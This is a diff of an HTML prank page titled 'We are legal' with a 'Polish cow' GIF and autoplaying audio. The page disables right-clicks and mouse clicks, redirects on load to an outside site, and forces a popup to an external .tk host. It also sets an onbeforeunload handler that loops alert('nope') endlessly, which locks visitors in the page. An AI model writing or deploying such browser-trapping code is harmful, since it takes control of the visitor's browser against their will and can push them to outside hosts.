--- a/index.html
+++ b/index.html
@@ -1,12 +1,16 @@
-<title>We are legal</title>
-<center>
-    <h1>We are legal</h1>
-    <img src="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fmedia.tenor.com%2Fimages%2Fde5baa5883f340e36d84e5251175f677%2Ftenor.gif&f=1&nofb=1" alt="Polish cow" />
-</center>
-<audio loop="loop" autoplay="true">
+<html oncontextmenu="return false">
+	<head>
+		<title>We are legal</title>
+		<center>
+    		<h1>We are legal</h1>
+    		<img src="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fmedia.tenor.com%2Fimages%2Fde5baa5883f340e36d84e5251175f677%2Ftenor.gif&f=1&nofb=1" alt="Polish cow" />
+		</center>
+		<audio loop="loop" autoplay="true">
             <source src="polishcow.mp3" type="audio/mp3">
         </audio>
+		
 		<script>
+		window.open("https://alexfunes.tk/polishcow.mp3", "topFrame");
 		document.onmousedown=disableclick;
 		function disableclick(event)
 		{
@@ -18,6 +22,11 @@
 		</script>
 		
 		<style>
+		body
+		{
+			background: #000;
+		}
+
 		video {
 			position: fixed;
 			top: 50%;
@@ -55,18 +64,15 @@
 			color: rgba(255, 255, 255, 0.75);
 		}
 		</style>
-	</head>
 	<script>
-    //"use strict";
-    window.open("https://youtu.be/0yTbSdt7I-A", "topFrame");
-</script>
 	<body oncontextmenu="return false" onload="location.href='https://www.darknessplugins.com/404', load();">
 		<video autoplay="" loop=""> 
 			<source src="ynf-qhqnf-fba-ynf-rkcrpgngvinf-qr-yn-ernyvqnq.mp4" type='video/mp4'>
 		</video>
 		<meta http-equiv=”refresh” content="5" />
 		<script>window.onbeforeunload = function(){
-  while (true) { alert("nope"); };
-};
-</script>
-    </body>
+  		while (true) { alert("nope"); };
+	};
+	</script>
+	</body>
+</html>
